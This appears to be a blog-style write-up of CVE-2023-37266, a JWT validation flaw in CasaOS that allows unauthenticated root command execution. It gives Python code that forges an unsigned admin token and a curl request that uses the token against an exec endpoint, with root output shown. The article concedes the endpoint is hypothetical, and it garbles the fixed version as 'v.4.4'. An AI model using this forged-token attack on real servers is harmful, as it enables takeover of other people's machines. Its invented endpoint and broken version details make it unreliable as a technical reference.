CasaOS is a popular open-source personal cloud system, allowing users to manage files, apps, and even run containers from an easy-to-use web interface. But in June 2023, a serious security vulnerability—CVE-2023-37266—was discovered. This bug allowed anyone, without logging in, to craft a fake authentication token (JWT) and unlock sensitive features, even running system commands as the root user.

What’s the CVE About?

Normally, CasaOS uses JWT (JSON Web Token) to manage user authentication so only authorized people can access protected functions. However, due to poor token validation, attackers could make arbitrary JWTs and fool the CasaOS backend into thinking they're an admin.

Worst of all, they can execute arbitrary commands as root—meaning full control over your server.

The vulnerability was fixed in commit 705bf1f and shipped in CasaOS v.4.4.

Exploiting CVE-2023-37266: How It Works

Let’s break down how an attacker could exploit this flaw.

1. JWTs Should Be Signed: CasaOS was not properly checking the signature of incoming JWTs.
2. Anyone Can Craft a JWT: So, an attacker could generate a token with any data they want and use it to authenticate.
3. APIs Grant Access: The attacker sends this token in requests to the CasaOS API and gets access to privileged features.

Here’s some simple Python code (using PyJWT) to create such a token:

import jwt

# Crafting a JWT with admin privileges
payload = {
    "user": "admin",
    "role": "admin"
}

# Use 'none' algorithm and no signature
token = jwt.encode(payload, key='', algorithm='none')

print(f"Your evil JWT:\n{token}")

Attackers can then pass this token in the Authorization: Bearer <token> HTTP header when making API requests.

Exploit in Action

Suppose the CasaOS management API includes an endpoint to execute shell commands. With a forged token, an unauthenticated attacker could run:

curl -X POST http://your-casaos-instance:port/v1/exec \
  -H "Authorization: Bearer <evil_jwt_token>" \
  -d '{"command": "id"}'

If vulnerable, the server returns:

{
  "output": "uid=(root) gid=(root) groups=(root)"
}

This means the attacker just ran a command as root—with full control!

How Was it Fixed?

The maintainers fixed this in commit 705bf1f:

> Improve JWT validation to ensure tokens are correctly signed before being trusted.

Upgrading to CasaOS v.4.4 or later (Download from GitHub) closes the hole.

Key fix: CasaOS now ONLY accepts JWTs that are properly signed with the backend's secret key.

What Should You Do?

1. Upgrade Immediately: Go to the CasaOS .4.4 Release Page and update.
2. Block public access to CasaOS using firewall rules.
   - Only allow trusted users on local/private networks.

More Information & References

- Original CasaOS advisory
- CasaOS GitHub repository
- CVE details at MITRE

Wrapping Up

CVE-2023-37266 is a sober reminder that authentication bugs can lead to total server compromise. If you’re running CasaOS—especially on public IPs—update immediately or protect your instance behind a firewall or VPN.

Stay safe, and keep your open-source projects up to date!

Timeline

Published on: 07/17/2023 21:15:00 UTC
Last modified on: 07/31/2023 13:05:00 UTC